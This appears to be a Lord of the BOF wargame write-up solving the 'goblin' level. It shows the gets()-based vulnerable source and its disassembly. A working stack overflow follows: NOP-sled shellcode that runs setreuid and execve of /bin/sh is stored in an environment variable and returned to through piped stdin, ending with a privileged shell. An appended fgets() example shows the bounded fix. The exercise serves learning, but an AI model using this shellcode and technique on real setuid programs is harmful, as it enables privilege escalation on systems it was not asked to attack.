[cobolt@localhost cobolt]$ cat goblin.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - goblin
        - small buffer + stdin
*/

int main()
{
    char buffer[16];
    gets(buffer); // The difference from the previous level is that the value is passed in via stdin. Again, the string length is not checked.
    printf("%s\n", buffer);
}


[cobolt@localhost cobolt]$ gdb goblin
(gdb) set disassembly-set intel
No symbol "disassembly" in current context.
(gdb) disas main
Dump of assembler code for function main:
0x80483f8 <main>:       push   %ebp
0x80483f9 <main+1>:     mov    %esp,%ebp
0x80483fb <main+3>:     sub    $0x10,%esp //buffer size 0x10 (16 bytes)
0x80483fe <main+6>:     lea    0xfffffff0(%ebp),%eax
0x8048401 <main+9>:     push   %eax
0x8048402 <main+10>:    call   0x804830c <gets>
0x8048407 <main+15>:    add    $0x4,%esp
0x804840a <main+18>:    lea    0xfffffff0(%ebp),%eax
0x804840d <main+21>:    push   %eax
0x804840e <main+22>:    push   $0x8048470
0x8048413 <main+27>:    call   0x804833c <printf>
0x8048418 <main+32>:    add    $0x8,%esp
0x804841b <main+35>:    leave
0x804841c <main+36>:    ret
0x804841d <main+37>:    nop
0x804841e <main+38>:    nop
0x804841f <main+39>:    nop



Set up the shellcode in an environment variable...

[cobolt@localhost /tmp]$ export shellcode=`python -c 'print "\x90"*100+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`


Find its starting address. (The myenv code is in the previous post.)
[cobolt@localhost /tmp]$ ./myenv shellcode
shellcode is at 0xbffffcbd


<<low address---buffer(16)+sfp(4)+ret(4)----high address>>

[cobolt@localhost cobolt]$ (python -c 'print "\x90"*20+"\xbd\xfc\xff\xbf"';cat)|./goblin  //<- Because input is read from stdin, the cat command is used to pass the value in.
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

my-pass

euid = 503
hackers proof
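For contrast, here is a bounded version of the same read, as an added example that is not part of the original post or of the LOB source: fgets() replaces gets(), anything beyond the 16-byte buffer is discarded and flagged, and a constructed 24-byte line (the length of the padding-plus-address input above) is rejected instead of being written over sfp and ret. The function names read_line_bounded and accept_line are my own, and a tmpfile() stands in for stdin so the code runs offline.

```c
#include <stdio.h>
#include <string.h>

/* Read one line into buf (at most size-1 bytes plus NUL), stripping the
 * newline as gets() did. Returns bytes stored, or -1 on EOF with no data.
 * Sets *truncated to 1 when bytes beyond the buffer had to be discarded. */
int read_line_bounded(char *buf, size_t size, FILE *in, int *truncated)
{
    int c, discarded = 0;
    size_t len;
    *truncated = 0;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
        return (int)len;
    }
    /* No newline: the line did not fit. Drain it so leftovers cannot reach a later read. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        discarded++;
    *truncated = discarded > 0;
    return (int)len;
}

/* Feed one constructed line (a tmpfile stands in for stdin) into a 16-byte
 * buffer, the size goblin.c uses. Returns the accepted length, -1 on empty
 * input, or -2 when the line was over-long and therefore rejected. */
int accept_line(const char *text)
{
    char buffer[16];
    int truncated, n;
    FILE *in = tmpfile();
    fputs(text, in);
    rewind(in);
    n = read_line_bounded(buffer, sizeof buffer, in, &truncated);
    fclose(in);
    if (truncated)
        return -2;
    printf("accepted %d bytes: \"%s\"\n", n, buffer);
    return n;
}

int main(void)
{
    /* Constructed 24-byte line: the length of the post's 20 bytes of padding plus the 4-byte address */
    return accept_line("AAAAAAAAAAAAAAAAAAAABBBB\n") == -2 ? 0 : 1;
}
```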

